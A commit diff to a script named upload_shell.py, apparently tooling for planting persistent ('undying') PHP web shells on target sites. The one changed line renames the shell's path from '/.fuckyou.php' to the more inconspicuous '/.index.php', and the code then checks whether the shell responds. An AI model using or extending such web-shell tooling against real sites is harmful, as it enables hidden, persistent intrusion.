Update upload_shell.py
This commit is contained in:
parent
69d55d4be5
commit
85ca75ae85
@ -120,7 +120,7 @@ def upload(url,method,passwd):
|
||||
except :
|
||||
pass
|
||||
#尝试访问不死马生成的shell
|
||||
shell_url = b_url+"/.fuckyou.php"
|
||||
shell_url = b_url+"/.index.php"
|
||||
res = requests.get(shell_url)
|
||||
if res.status_code!=200 :
|
||||
print "[-] %s create shell failed!" %bsm_url
|
||||
|
Loading…
x
Reference in New Issue
Block a user